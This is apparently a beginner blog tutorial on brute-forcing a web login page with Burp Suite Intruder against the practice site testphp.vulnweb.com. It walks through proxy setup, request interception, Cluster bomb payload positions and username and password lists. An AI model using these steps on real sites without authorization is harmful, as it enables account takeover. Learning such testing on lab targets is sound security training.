Demonstrate Brute Force On Web Login Page By Using BurpSuite

Burpsuite Demonstration Web Login
Burpsuite Demonstration Web Login

The following tutorial is a beginner guide on Brute Force attack by using the Burp suite.

In this article, we have demonstrated the web login page brute force attack on a testing site “testphp.vulnweb.com”.

Also check the Video at the end of the Tutorial

Burp Suite: Burp Suite is a Java-based Web Penetration Testing framework. It has become an industry-standard suite of tools used by information security professionals. Burp Suite helps you identify vulnerabilities and verify attack vectors that are affecting web applications.

You can Download BurpSuite New Edition here

Brute Force Attack : Brute force plays a vital role in web penetration testing because is the simplest method to gain access to a site or server by checking the correct username or password by calculating every possible combination that could generate a username or password.

What is a dictionary/ wordlist?
Dictionary or Wordlist is a collection of words which are quite useful while making brute force attack. There are several tools which let you generate your dictionary that you can use in brute force attack.

Requirements?

  • BurpSuite
  • Any Browser (We use chrome here)
  • Network Proxy
  • Demonstrate Link testphp.vulnweb.com

First, ensure that Burp is correctly configured with your browser. If not then follow the following steps. 

To configure Burp Suite demonstrate. Follow the steps.

First Go to your browser settings and in the search box type proxy then select open proxy settings > In connection tabs > Lan settings > Tick Use a proxy server for your LAN > (127.0.0.1 port number 8080) then Click ok .

Using Burpsuite For Brute Force Website Login Page

Now open Burp Suite.

In the Burp Proxy tab, ensure “Intercept is off” and visit the login page of the application you are testing in your browser.

Using Burpsuite For Brute Force Website Login Page

Turn on Intercept

Brute Force Website Login Page using Burpsuite

In your browser enter the random username and password, then submit the request to intercept the browser request using burp suite.

Brute Force Website Login Page using Burpsuite

Brute Force Website Login Page using Burpsuite

Right click on the request to bring up the context menu and  click “Send to Intruder”.

Brute Force Website Login Page using Burpsuite

Then select the Positions tab and follow the below steps:

  • Change the attack to “Cluster bom*b” using the “Attack type” drop down menu.
  • Clear the pre-set payload positions by using the “Clear” button on the right of the request editor and click add for set payload.

Brute Force Website Login Page using Burpsuite

Go to the “Payloads” tab. In the “Payload sets” settings, ensure “Payload set” is “1” and “Payload type” is set to “Simple list”.

In the “Payload options” settings enter some possible usernames. You can do this manually or use a custom or pre-set payload list.
Brute Force Website Login Page using Burpsuite
Next, in the “Payload Sets” options, change “Payload” set to “2”.In the “Payload options” settings enter some possible passwords. You can do this manually or using a custom or pre-set list.

Brute Force Website Login Page using Burpsuite

Click the “Start attack” button.

Brute Force Website Login Page using Burpsuite

In the “Intruder attack” window, you can sort the results using the column headers. In this example sort by “Length” and by “Status”.

Brute Force Website Login Page using Burpsuite

The table now provides us with some interesting results for further investigation.

By viewing the response in the attack window we can see that request 6182 is logged in as “test“.

To confirm that the brute force attack has been successful, use the gathered information (username and password) on the web application’s login page

Copy the Raw text of request

Brute Force Website Login Page using Burpsuite

Paste the Raw text request in the Proxy tab > Intercept > Raw

Brute Force Website Login Page using Burpsuite

Click on forward request and see the result

Brute Force Website Login Page using Burpsuite

 

Watch Video Tutorial

Disclaimer: This tutorial is Knowledge Purpose only.

For the latest update about Cyber and Infosec World, follow us on Twitter, Facebook, Telegram , Instagram and subscribe to our YouTube Channel.

Subscribe to HackersOnlineClub via Email

Enter your Email address to receive notifications of Latest Posts by Email | Join over Million Followers

More from Kaushal Jangid

DNSRECON- To Use DNS Information Gathering

Today, we are going to teach you about DNSRECON which is use...
Read More

Leave a Reply